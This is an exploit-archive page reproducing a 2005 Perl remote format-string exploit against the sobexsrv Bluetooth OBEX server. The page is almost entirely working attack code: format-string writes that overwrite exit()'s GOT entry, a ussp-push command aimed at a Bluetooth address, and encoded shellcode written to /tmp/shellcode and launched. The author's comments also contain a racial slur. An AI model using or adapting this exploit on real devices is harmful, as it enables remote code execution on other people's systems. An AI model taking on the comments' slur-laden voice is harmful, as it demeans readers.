sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit
# Published : 2005-12-03
# Author : Kevin Finisterre
# Previous Title : WIDCOMM Bluetooth Software < 3.0 Remote Buffer Overflow Exploit
# Next Title : Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)

#!/usr/bin/perl
# 
# trifinite.group Bluetooth sobexsrv remote syslog() exploit
# code by kf_lists[at]digitalmunition[dot]com
#
# http://www.digitalmunition.com
#
# Shouts to my nigga Chung and the Donut Shop... keep fighting that SARS dude!
# Big ups to d4yj4y beeeeeeeeeeeeeotch! 
#
$retloc = 0x8053418;   # Due to unicode the filename is NOT usable. Must use file contents. 

# R_386_JUMP_SLOT exit()
$addy  = "x5ax19x05x08";
$addy2 = "x58x19x05x08";

$lo = ($retloc >> 0) & 0xffff;
$hi = ($retloc >> 16) & 0xffff;

$hi = $hi - 0x38;
$lo = (0x10000 + $lo) - $hi - 0x38;

#print "hi: $hin";
#print "lo: $lon";

$string = "./ussp-push 00:0B:0D:63:0B:CC@1 /tmp/shellcode " . "$addy$addy2%$hi.d%27\$hn%$lo.d%28\$hn" . "x41" x 200;
#print $string . "n";

$sc = "x90" x 31 . # Metasploit /usr/bin/id shellcode 
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4cx46x4bx50x4ax35".
"x49x39x44x55x48x46x4ax46x4dx52x43x36x49x58x47x4e".
"x4ax56x4fx52x43x57x4ax46x42x50x4ax56x4fx32x44x56".
"x49x46x50x56x49x58x43x4ex44x45x4ax4ex4ex30x42x30".
"x42x30x42x50x4fx32x45x47x43x57x44x47x4fx32x44x56".
"x49x36x50x46x4fx52x49x56x46x36x42x50x47x45x43x35".
"x49x58x41x4ex4dx4cx42x38x5a";

open(F, "> /tmp/shellcode") or die "can't open file";
print F "$scn";
close(F);

system($string);

# www.Syue.com [2005-12-03]